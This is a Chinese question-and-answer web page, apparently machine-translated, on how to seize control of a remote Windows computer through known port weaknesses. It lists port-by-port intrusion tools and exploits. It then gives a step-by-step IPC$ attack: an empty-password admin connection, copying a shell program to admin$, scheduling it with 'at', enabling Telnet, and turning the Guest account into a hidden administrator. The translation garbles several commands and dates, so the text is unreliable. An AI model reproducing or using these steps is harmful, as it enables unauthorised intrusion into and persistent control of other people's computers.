當前位置:成語大全網 - 新華字典 - 知道了壹臺電腦的IP和端口漏洞,如何控制?詳細!!!!!!!!!

知道了壹臺電腦的IP和端口漏洞,如何控制?詳細!!!!!!!!!

妳想成為特洛伊馬嗎?黑軟底相對初級的課程。

/Soft/html/21/74/2006012216483529 . shhtml

我查壹下端口135的端口描述:端口135主要用於使用RPC(遠程過程調用)協議,提供DCOM(分布式組件對象模型)服務。通過RPC,在計算機上運行的程序可以成功地在遠程計算機上執行代碼。使用DCOM,我們可以直接通過網絡進行通信,並且可以跨包括HTTP協議在內的各種網絡進行傳輸。

端口漏洞:相信去年有很多Windows 2000和Windows XP用戶感染了“沖擊波”病毒,該病毒利用RPC漏洞攻擊電腦。RPC本身在處理通過TCP/IP的消息交換時存在漏洞,這是由於對格式不正確的消息處理不當造成的。此漏洞將影響RPC和DCOM之間的接口,該接口偵聽端口135。

1:入侵端口139。

讓我們首先確定壹個具有139端口漏洞的主機。用掃描工具掃描!例如,SUPERSCAN是壹個端口掃描工具。假設現在我們得到了壹個有139端口漏洞的主機,我們需要使用命令nbtstat -a IP來獲取用戶的情況!我們現在需要做的是與另壹臺計算機建立資源共享連接。

使用了兩個NET命令,下面是這兩個命令的使用方法。

網觀?

功能:顯示指定計算機的域列表、計算機列表或* * *資源列表。?

命令格式:netview [\ \計算機名|/域[:域名]]?

參數介紹:?

& lt1 & gt;鍵入不帶參數的net view以顯示當前域中的計算機列表。?

& lt2 & gt\\computername指定要查看其* * *資源的計算機。?

& lt3 & gt/domain[:domainname]指定要查看其可用計算機的域?

凈用?

功能:連接電腦或斷開電腦與* * * *享受的資源的連接,或顯示電腦的連接信息。?

命令格式:net use[設備名| *] [\ \計算機名\共享名[\卷]]?

[密碼| *]][/用戶:[域名\]用戶名] [[/delete] |?

[/persistent:{yes | no}]]?

參數介紹:?

鍵入不帶參數的net use列出網絡連接。?

Devicename指定要連接的資源的名稱或要斷開的設備的名稱。?

\\computername\sharename服務器和* * *共享資源的名稱。?

密碼訪問* * *共享資源的密碼。?

*提示輸入密碼。/user指定要連接的另壹個用戶。?

域名指定了另壹個域。?

用戶名指定登錄用戶名。?

/home將用戶連接到他們的主目錄?

/delete取消指定的網絡連接。?

/persistent控制永久網絡連接的使用。?

C:\net使用\\IP

C:\net view \\IP

我們看到對方* * *已經很享受他的C、D、E碟了。

我們需要做的是使用NBTSTAT命令加載NBT緩存。

c:\ & gt;加載NBT緩存。

c:\ & gt;查看它是否被加載到NBT緩存中。

現在我們已經獲得了存在139端口漏洞的主機的IP地址和用戶名,是時候進入他的計算了。點擊開始-搜索-電腦,輸入剛找到的主機名稱,選擇搜索找到這臺電腦!雙擊進入,使用方法和線上領隊壹樣。

2: 4899端口入侵

使用4899過濾器。使用空密碼掃描機器。

3點80分入侵

對於sp3之前的機器,可以用webdav入侵;

對於bbs論壇,可以嘗試上傳漏洞(upfile.exe或dvup_delphi.exe)。

可以使用SQL進行註入。(啊,D的註射軟件)。

4: serv-u入侵(端口21)

對於低於5的系統。004,可以使用溢出入侵。(serv5004.exe)

對於5.1.0.0及以下版本的系統,您可以在本地升級您的權限。(servlocal.exe)

serv-u的MD5加密密碼可以用字典進行分解。(crack.vbs)

輸入壹個由serv-u加密的密碼(34位長),與字典文件(dict.txt)比較得到密碼。

5: 554端口

利用real554.exe入侵。

6: 6129端口

用DameWare6129.exe入侵。

7.端口6129

用DameWare6129.exe入侵。

8.系統漏洞

利用端口135和445,利用漏洞ms03026、ms03039、ms03049和ms04011,

進行溢出入侵。

9.3127等端口

妳可以用毀滅病毒打開端口,用nodoom.exe入侵。(在mydoomscan.exe中提供)。

10.其他入侵

用盧杉的入侵軟件入侵(WINNTAutoAttack.exe)。

典型的IPC$入侵

1.c:\ & gt;net use \ \ 127 . 0 . 0 . 1 \ IPC $ " "/user:" admin滴定儀"

這是壹個帶“streamer”的IP地址,用戶名是administrators,密碼是“empty”(如果妳夠生氣,可以用這個命令和127.0.0.1建立連接。

然後因為密碼是“空”的,所以不需要在第壹個引號中輸入,用戶名在第二個引號中。

,輸入administrators,該命令將成功完成。

2.c:\ & gt;復制srv.exe \ \ 127 . 0 . 0 . 1 \ admin $

先復制srv.exe,它會在Streamer的工具目錄下(這裏的$指的是admin用戶的。

C:\winnt\system32\,也可以用c$和d$表示驅動器C和驅動器D,具體看妳要復制到哪裏)。

3.c:\ & gt;凈時間\\127.0.0.1

查時間,發現127.0.0.1當前時間為165438+2002年3月淩晨0:00,命令成功完成。

4.c:\ & gt;srv.exe時間\ \ 127 . 0 . 0 . 11:05

用at命令啟動srv.exe(這裏設置的時間比主機時間快,不然怎麽啟動?

5.c:\ & gt;凈時間\\127.0.0.1

再查壹遍。妳找到時間了嗎?如果127.0.0.1的當前時間是2002年3月的11:05 am,那麽準備。

啟動以下命令。

6.c:\ & gt;遠程登錄127.0.0.1 99

這裏將使用Telnet命令。註意端口是99。Telnet默認端口為23,但是我們使用

是SRV在另壹臺電腦裏給我們設置了壹個99端口的Shell。

雖然我們可以Telnet,但是SRV是壹次性的,下次登錄的時候就會激活!所以我們戰鬥。

計算建立壹個遠程登錄服務!這將使用ntlm

7.c:\ & gt;復制ntlm.exe \ \ 127 . 0 . 0 . 1 \ admin $

使用Copy命令將ntlm.exe上傳到主機(ntlm.exe也在Streamer的工具目錄中)。

8.c:\ WINNT \ system32 & gt;ntlm

輸入ntlm startup(此處為c:\ win nt \ system32 >;指的是其他計算機,運行ntlm實際上是為了使這

壹個程序正在另壹臺計算機上運行)。當“DONE”出現時,表示已經正常啟動。然後制作

使用“net start Telnet”啟動Telnet服務!

9.Telnet 127.0.0.1,然後輸入用戶名和密碼進入對方。操作就像在DOS上操作壹樣。

就這麽簡單!那妳想做什麽?想幹嘛幹嘛,哈哈)

為了以防萬壹,我們將把來賓激活添加到管理組中。

10.c:\ & gt;網絡用戶來賓/活動:是

激活對方的客人用戶。

11.c:\ & gt;網友來賓1234

將Guest的密碼更改為1234,或者您想要設置的密碼。

12.c:\ & gt;net本地組管理員來賓/添加

將來賓更改為Administrator^_^(如果管理員密碼更改了,而來賓帳戶沒有更改,則下次我

學生可以使用來賓再次訪問這臺計算機)

/p?W=每個端口的入侵。% 20&;k =拉拉& ampaid=B0100019074

不要太復雜!